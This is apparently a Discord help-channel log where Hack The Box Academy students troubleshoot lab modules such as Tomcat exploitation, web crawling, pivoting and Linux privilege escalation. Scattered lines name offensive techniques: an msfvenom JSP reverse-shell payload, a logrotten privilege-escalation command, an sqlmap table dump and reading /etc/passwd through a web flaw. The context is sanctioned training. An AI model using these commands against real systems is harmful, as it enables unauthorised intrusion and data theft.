windows tools you can zip all of them, put it in a shared folder, then copy back into your new vm

just write down a list of everything you have installed, then reinstall once you spin up a new vm

yeah but i'll lose a bunch of settings and other shit

that's why i have golden images of my VMs so i don't have to think about those

that's why you have whats

golden images

I tried it in the pwnbox and even on my Windows machine same result

you can save your settings separately tbh and reimport if you reaally want to

they are VMs i can copy at any time that have all my tools settings and preferences already set up so i don't have to do entire setup again

I just keep snapshots and keep my vm on a big usb

yeah i take a ton of snapshots, i just wish there was a good way to know when what i'm doing should work and that reverting to a snapshot might fix it

okay well reverse shells still work on my vm

let's see if reverting to a snapshot works

is this one of the "works on pwnbox" but not on the vm moments

yep

had a few of those

classic

haven't had that issue on academy, on usage box though...

it would just really be nice to know when i'm getting it right and it's my vm that's busted

because it turns out the solution was one i tried like hours ago

is your openvpn working, like in logs is it connected, sometimes i need to download a new .ovpn for some reason

yep

appears to be working fine

i'll try installing a new ovpn file

i just tried, it works to get /etc/passwd file. Review the course material, you'll find it if you dig maybe a bit deeper

Yeah I got it to work in the pwnbox but still not anywhere else

there is no vpn in this module, it can work from anywhere

update: restoring a snapshot and installing a new ovpn file both did not work

this is a fat fuckin Tomorrow Me Problem

huh usually what fixes it is either new ovpn or swap regions

You would think but nope only the pwnbox is able to do it

Tried it in Kali and on Windows and it just hangs. Fire up the pwnbox and the file pops up no problem same exact url

i just did it from my vm

Weird the next question I had no problem with

Went back and the only place /etc/passwd works is in the pwnbox. Oh well not going to waste anymore time worrying about problems on their side.

Thank you @wraith pelican for going in and checking for me!

Obtain remote code execution on the http://web01.inlanefreight.local:8180/ Tomcat instance. Find and submit the contents of tomcat_flag.txt
on https://academy.hackthebox.com/module/113/section/1211
I already got the RCE but i cant see the tomcat_flag.txt file,

They gave you the file name, you can use locate if it's installed or find. I don't have my notes for that section.

i did tired that but its either no result or some java errors.

can you do me a favor and show me the command you're using to try and find the location of "tomcat_flag.txt" ?

hey, where can i share my feedback to a particular module ?

||find / -name tomcat_flag.txt 2>/dev/null|| i url encode this. locate command is not installed tho so i used find

not sure what you mean but when you finish a module you can submit a review

I was doing the Linux Fundamental module and in the Linux Structure Section particularly coming across this point: The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as the files required to boot the other filesystems. After boot, all of the other filesystems are mounted at standard mount points as subdirectories of the root. this point is kind of hard to understand as a beginner (i mean those sentence) and it will be so good if it is more clear. It's just my Feedback, Thank you.

ah are you using a web shell then? with the standard|| jsp_shell_reverse_tcp payload from msfvenom, it gives us access to a full shell||, so need to URL encode anything

that find command should find the flag very quickly 😉

but i do want to know how to manually find the flag after exploiting with .war

thanks!

right, basically have to use either find or locate. And locate only works if we are able to run sudo updatedb beforehand (typically)

yeah i hear you...that one is kinda funny... files filesystems other filesystems... mounted at mount points... pheww

yeah gottacha!

just think of the / in linux as the C: drive in Windows

yeah, true.

yep, I understood but just saying that the sentence could be much simpler to explain that. Thank you.

and i wouldn't worry too much about not fully grasp every new thing thrown at you. Things will progressively be clearer when you practice further. They just try to be precise in their explanation and concise at the same time

okay 👍

yes its perfectly normal and also intentional that students have additional questions as they are reading the material

Hi, is anyone know how to do hyperlink a text in sysreptor?

have you checked the sysreptor docs? https://docs.sysreptor.com/designer/faqs/

do you guys have a go to guide for ligolo ? following the hackingarticles one, but wondering what else people are using

Been trying that in CWE field but still can't hyperlink the text

tbh ive only used sysreport once or twice. But it looks like its just using standard markdown. Is this for a particular module you are working on?

I used a bit of multiple sources when googling.Just saved that one recently when you asked those pivoting questions https://medium.com/@issam.qsous/mastering-multi-pivot-strategies-unleashing-ligolo-ngs-power-double-triple-and-even-quadruple-dca6b24c404c

i will take a look at it, cheers

quadruple pivot

yeah quadruple, i knew it would speaks to you : D

Go here https://htb.sysreptor.com/htb/signup/ and register, they provide templates for the various htb certs. https://www.hackthebox.com/blog/certification-templates

and its free

okay i made a slight adjustment... just a comma added, but hopefully makes the message a bit more clear.

Greetings here. Am trying to start a simple web server with php but i am failing. So far i am using the command php -S <ip address>:<port number> but this has been marked wrong, also when i click the lick to open the files were the web server is running i get a resource not found error.

Could this also be related to my apache2 failing to run when i start it?

Hi, for Exploiting Web Vulnerabilities in Thick-Client Applications, I am able to get fatty-server.jar but it does not open. Task manager shows that it is running but I am unable to interact with it.Can anyone help me with this?

Yeah I use that tools right now but can't markdown CWE's to CWE link

@everyone

Hello, anyone happen to be free to help troubleshoot a problem I am experiencing with my pc?

Don’t try to ping everyone

<@&861185840277487616>

i promise that when i am going to finish this puzzle i mean this month i am going to return my debt 10x

Sure bud

Go to a bank

If you don’t tell us your problem, no one can help

My computer has been running super slow on startup and browsing

That doesn’t say much

Go do a factory reset

ty

Is it windows?

Mac

Am not so familiar with mac OS but Try stopping all unnecessary services running in the system monitor, have you recently installed updates? whats your memory like

Hii anyone?

Can i dm someone regarding the web attacks - skills assesments?

nvm i got it

<@&861185840277487616>

need sanity check for question 1 in Special Permissions in linux priv section, i have tried all the files but none work, but i manage to solve 2nd question tho with the same result

nvm solved

guys

i need a help

Not today Elliot

why ??

Too busy working at Ecorp

hahahahaha

but i cant get into it , the loneliness just came back

anyways i have a problem in hackthebox , in the module " web requests " the machine in the first question doesn't working , they just told me " target is spawning ..." then waiting till the end of the earth and i can't get the IP 😦

hard refresh and try it again?

i did all the solution in your mind , and it still not working

🤷‍♂️

thx btw

1st section: hypertext ? works here

just fgt it , the problem is unknown to solve this prob i may need to contact the support ( ik they will not respond till the hair grows in my nose )

works for me too

Any1 else have issues with spawning targets?

Yeah

Yup, targets aren't spawning

Well it is 4:00am, I suppose this is my sign to go to bed lol

Hello guys, Im having some problem with Login Form Attacks in the Login Brute Forcing Module, Im using rockyou.txt as it says but still couldnt find the password for login.php

LSA is not a process running like lsass.exe right? Is it just a specification which lsass implements?

I just booted up this module. Adapt their commands on the page to your own needs. I was just able to get the flag in a couple seconds

hmm ok i will give it a another shot

LSA is the system component that's responsible for local security policies, lsass is the process/service that carries out most of the tasks

System component in this context means LSA is part of the operating system right? So is it sort of like a specification which lsass must follow?

it does what's configured in the lsa

ah ok thanks!

https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication#BKMK_LSA
there is a part describing LSA

I know this is not exactly the right place but do you mind if i talk about why I quit my cybersecurity job, and i ran away from my roommate, im in a motel right now

I've lived with my roommate before that for about 6 months, he was also my colleague from a different department, he was mostly an okay guy but there was one weird thing about him

Did you create an account just to share your story😂

He kept telling me that there was a mermaid in the attic of the house and that he had "intercourse" with that mermaid every single day, i thought that was weird, but I laughed it off everytime he said it.
I mean, everyone is weird in tehir own way right? Its whatever?

So

Anyway,
the 6 months go by and my curiosity is really starting to kill me me, so i decide to go up there to check the attic out for myself, So i wait for him to leave the house, and I proceed to actually go upstairs into the attic for the first time ever, you know what i found in there? A deəd monkey with its legs sticthed togather

From there
I pack my bags and i get the fuck out of there asap
Still at the motel, i told him that i got fired and I'm going back to newyork, i wanna pretend that i never saw a thing

Bruh

buh what

😬😬😬😬😬😬

Jesus

If i call the cops, he might come after me when they release him

bro said buh

I took pics of the monkey, it was a red howler breed
The pictures are extraordinary disgusting, if you got the stomach for them ill share them

🤣

He kinda looked like a mermaid though to be fair

I’m at a loss for words

Alright, alright,enough
I made the story up

It was inspired by a joke form frankie boyle

Knew it🤣

https://youtu.be/oX1jMmfG2Xk?feature=shared

Here is the joke

Ill see myself out

Bye

and now we have to live with images of monkey in mermaids disguise... thanks for that

I'm working on Attacking Enterprise Networks: Web Enumeration and Exploitation and I'm having issues editing the cookie with cookie editor. I was able to grab the cookie value using the php server, but when editing it I'm receiving the error: "First-Party Isolation is enabled, but the required 'firstPartyDomain' attribute was not set.".

Bro what the actual fuck

i just completed the skills assessment for command injections. took me nearly forever to find the vulnerability in the first place. is this something that comes with experience/practice? or is there a method that makes this easier. i went through a few rabbit holes which i thought was vulnerable, before finally discovering the correct bug

I don't know if I'm in the right place, I'm trying to work on the "Practical Digital Forensics Scenario".
Unfortunately the RDP session is extremely lame and it takes several seconds after a click or keystroke 😦

~~

Like which server you using?

xx.197.207

I'm asking like what VPN server you using?

you can edit cookies using the browser

EU-academy-2

whats the ping?

try chaning the VPN server.

in the file transfer module. I am trying to get practice copying files using scp. I have enabled ssh on the pwnbox. I'm using this command to copy a file named test.txt "scp htb-ac-546869@10.10.14.231:/home/htb-ac-546869/test.txt ." The connection keeps timing out? I've verified that ssh is enabled on the pwnbox. I was able to get transfers to work from the target machine back to my pwnbox but not the other way around. I'm assuming its a firewall fule? any suggestions?

i've even added a testuser and tried it that way, with no luck.

ok i got it, TCP doesn't work but UDP is fine thank's

Nice Nice.

check your ssh config?

Your ip/username doesn't look correct. the IP you're transferring to looks like the pwnbox or your vm. you're supposed to transfer to the target i believe, not the pwnbox

it was for practicing uploads so from target -> pwnbox

and you get connection refused, looks like ssh is disabled

does normal ssh work?

i guess it says timed out not refused

but still, i don't think you're meant to xfer like that. should be from pwnbox to target box

normal ssh does work

yeah this

i just figured it would work both ways. Thanks

and then it walks you through the steps of starting an ssh server on your pwnbox etc. But i couldnt get it to work.

it should

maybe outbound ssh connections are disabled for that target

Hello, anyone down for a little help on the Process Injection Section of the Evade Windows Defender Module ?

Ssh is already enabled on pwnbox

Windows Privilege Escalation module DNSAdmins section has me load a DLL file. However the DLL ends up crashing the DNS service upon restart, basically preventing the DLL from executing. Is there anything I can try?

Hi all! It is possible a hint for ntlm relay attack skills assessment question 3!! I own Backup01, but then I am stuck, the creds of ||sql_ftp_test|| doesn't give me any special access on ||shares || and ||with the host I've created|| I can read in some shares but no clue what to do. Thank you!!

check all the accounts you have control over for what shares you can access

Could I dm you to avoid flooding the chat with more questions?

So I have made some progress doing the Windows Event Logs & Finding Evil module - I just done the reflective DLL, the windows lab is incredibly slow and it nearly booted me out, is there anyway I can get the files and spin up my own VM to do the rest? I am assuming not but thought I would ask the question

No

The ways you can speed up is changing vpn regions, using tcp instead of udp

I thought the hint is pretty self explanatory check the shares of the sql machine using all the accounts you have

Yeah I have done both, no dramas... I'll just plod along it isn't a race

thank you! I was more focus on finding ||write permissions||

I'm working on the Command Execution Skills assessment and just need some guidance. Does anyone have some time to DM about it?

I just need a sanity check to verify that I'm on the right track.

for module Linux Priv Esc, Logrotate section
i have used this script but nothing works
||./logrotten -p payload backups/access.log||
anyone can guide me?

I'd check to make sure your payload isn't conflicting with how the logs are created

Also can I apologise for the other day asking stupid questions, I hadn't moved what I needed, to a user writable area as told in the actual course material, main issue was that... layer 8 issue, Sorry 😂

for the command execution skills assessment, I need to move the flag to the tmp directory, correct?

yes

@old oasis thanks. I think I've found the vulnerability, I'm just having trouble fuzzing it out.

@old oasis Mind if I DM you real quick about it?

sure

thank!

hi I'm getting this weird error when I try to crawl inlanefreight.com on htb academy's creepy crawlies section of information gathering web edition module

└──╼ $python3 ReconSpider.py http://inlanefreight.com
Traceback (most recent call last):
  File "/home/htb-ac-605555/ReconSpider.py", line 6, in <module>
    from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'

Try installing Scrapy in a virtual environment with Pip

I did that won't work either

#modules message

┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $pip3 install scrapy
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
    python3-xyz, where xyz is the package you are trying to
    install.
    
    If you wish to install a non-Debian-packaged Python package,
    create a virtual environment using python3 -m venv path/to/venv.
    Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
    sure you have python3-full installed.
    
    If you wish to install a non-Debian packaged Python application,
    it may be easiest to use pipx install xyz, which will manage a
    virtual environment for you. Make sure you have pipx installed.
    
    See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.

[notice] A new release of pip is available: 24.0 -> 24.1.1
[notice] To update, run: python -m pip install --upgrade pip

and then this won't work either:

└──╼ $python -m pip install --uprade pip

Usage:   
  /usr/bin/python -m pip install [options] <requirement specifier> [package-index-options] ...
  /usr/bin/python -m pip install [options] -r <requirements file> [package-index-options] ...
  /usr/bin/python -m pip install [options] [-e] <vcs project url> ...
  /usr/bin/python -m pip install [options] [-e] <local project path> ...
  /usr/bin/python -m pip install [options] <archive url/path> ...

no such option: --uprade

hold on misspelled upgrade

nope still won't work

you're not in a virtual environment

run this

┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $python -m pip install scrapy --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: scrapy in /usr/lib/python3/dist-packages (2.8.0)

😐

buddy can you just run what I sent

#1257062567965364334 message

I did

Funny enough @heavy mango helped with this previously

@fathom pendant ok this answers my question because what @next bronze suggested didn't work

I actually realized that both ways work. Either replacing the line in the script or running the whole thing in a virtual environment

Likely a weird thing with python 3.11 and 3.12

ok got it

you're not even in a venv

of course it won't work

when I tried it start a venv it didn't work

it worked when I tested it in pwnbox

ok let me try again

what's your solution

modifying the script?

Yeah

┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $python3 -m venv /home/htb-ac-605555/
┌─[htb-ac-605555@htb-h8nxsns0b4]─[~]

this doesn't work it literally does nothing

dude

That's what I tried first, but then I saw someone running it in a venv which also worked

if you can't even copy and paste I can't help you

That doesn't look like what xreous sent

I did copy and paste

ok let me reread Xreous comment

ah ok

seems like pwnbox update broke some stuff

it's Parrot 6.1 in general I think

I'm running my own VM

Nah 6.1 didn't break anything for me

Maybe Python then like you said

just python things

have you managed to make it work?

wait got it activated now trying again

I got virtual environment activated and it did nothing

(venv) ┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $sudo pip install scrapy
error: externally-managed-environment

× This environment is <SNIP>

can you just copy and paste the 3 lines verbatim

why are you using sudo

wait hold on I installed scrapy without sudo and it worked

now it worked

why the hell if you use the same command on pwnthebox it works while from your own virtual machine it does not?

maybe because it is installed correctly on the pwnbox

no man. inlanefreight.com is opened on the internet. I use the same command, same wordlist (verified the size and hash) and it misses some findings on my vm

Is there an additional step that I have to take to route my curl traffic through burpsuite using proxychains?
Or a setting/feature that I have enabled or disabled that would cause curl requests going through proxychains to respond with 'couldn't connect to server'? When I curl to the same ip normally, it goes through, but when using proxychains it doesn't. https://academy.hackthebox.com/module/110/section/1053

solved it

now doing next section of module

I think some filtering due to massive traffic is applied but that just makes it confusing, expecially if the question requires to bruteforce

works on mine

can i dm you?

no

works in a fresh install, just add the line into the config file and run burp

Yea it worked on the pwmbox should i make a new vm

do you have firewall or something

you can try reinstalling burp

ill do that

nvm figured that out. It now works on my vm too

good! what was the issue?

I'm not supposed to tell you that 🙂

: D fair enough

joking. I'll share that for whoever is reading: make sure to use public dns servers. dnsenum was querying my local isp dns. Also works with gobuster

Hi. Is it normal that Pwnbox lacks CrackMapExec?

use netexec instead

Ok. Thanks man!

ok it works now tysm 🥰 🀄

Further Credential Theft in windows priv esc

it is a section that exists in that module

Further Credential Theft in windows priv esc. iam supposed to add vhost in rdp?

the IP address should work just fine

Anyone know of any modules that might go over scanning external hard dives or USBs for potential threats? Or anywhere I could get some information on best practices?

In the antak portion of the shells and payloads module I was able to get a webshell but I'm unable to interact with it has anyone else ran into a similar issue?

Hi guys im doing a module and its says that i need to use CVE-2021-1675 - PrintNightmare LPE and im wondering how can i enumerate the system manually to discover that is this vulnerability that i need to exploit. Thanks for the help

wdym? if you can load the webshell you can interact with it

Like the webshell pulled up I just cant type anything

make sure your copy is woring and upload again

I've uploaded 3 times now changed the credentials and all that like the module said, but for some reason can't type on the shell?

haven't seen that before, use a different browser maybe

I'll try that

I must have missed something because I can't get this to work. Could it be because I had to git clone antak since it wasn't in my usr/share directory?

Shouldn't be, that code hasn't been updated in 9 years. You try on pwnbox?

No I was using my kali machine but I can try on pwnbox

That's at least an easy sanity check

wait are you clicking in the right place

the input box is seperate from the output

I only see one box that I can't type out of is there a seperate box that is supposed to pop up?

input is at the bottom box

This is what I see when I get my shell? I'm confused

I don't have anywhere to type?

Just above submit

Type there

Oh shit I clicked everywhere but there I guess appreciate the help

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

for the last question of last section of information gathering web edition, its asking me which API key the inlanefreight developers will be chacking to

I did reconpspider and I see a telnet password

Nope

You don't need to do any telnet or anything to find it

ok

Subdomain of subdomain

ok so like dirbuster?

Sort of

ok

You need to spider the x.y.inlanefreight.htb

So you need to find the right vhosts

ok thanks

ok cool

just finished it. In the last step you are supposed to use a crawler even if in the modules there's no explaination on how to use scrapy

for some reason burpsuite won't crawl beyond 12-13 depth so you have to write your scrapy crawler

? The ReconSpider tool that was written up was explained in the module

I wasn't able to make it use the hostname defined in /etc/hosts...

http://hostname:port

You still need to tell it what port to use, you don't define the port in /etc/hosts

yeah, my fault. The target changed the port number when time finished and I was still using the old port number and forgot to switch it in the url passed to reconspider tool :S

I wrote my own scrapy script, modified the hostname and parsed the output lol. Well at least I learned something new 🙂

Hi

Hello

whats the current bloodhound version? on Github it says v4.3.0, however having problem with sharpHound which is version 2.3.0 (stuck upload of .json), which indicates that its compatible only with BH 5. Kali repo only has 4.3.1.... Could someone shed some light on it?

BH CE (5.x) is the latest

however that's built for docker containers

I just went to one of the targets from ad enum and downloaded that one

2.3 afaik isn't compatible with < 5

c:\temp>sharphound.exe --version
sharphound.exe --version
2024-07-02T16:37:42.5164164-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
SharpHound 2.3.0

oh sorry yes, you're correct

I want to start learning Cyber Security quickly

you've come to the right place

Will I learn quickly?

learning cybersecurity is a marathon not a sprint 🙂 patience is key.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

That’s entirely dependent on you and how much work you put in.

So where to start learning useful things in Cyber Security from a beginner level

?

take a look at the link two messages above for a guide on how to start

well the HTB academy has the Information Security Foundations skill path which goes through the bare bones basics of things you may run into in the security field, which is vast

Just to add to what @fathom pendant said: I think it's better than portswigger academy

Granted: you only get half the course for free but I feel like I got a lot more understanding out of it than I did with Portswigger Academy.

How long does it take to learn Cybersecurity?

sort of depends on your determination, time, etc..

idk if this is intended

Sorry for the late reply but how to check how the log are created

cat the log?

but case10 on sql map i just did sqlmap -r case10 -T flag10 --dump

and got the flag lmao

didnt have to do anything else

i can provide the flag and SS for validation to those who have completed

https://discord.com/channels/473760315293696010/1252781216382582795

i actually just saw thi as you tagged lmao

but yeah i think its borked

What username allows you to log in to the target system via telnet with a blank password?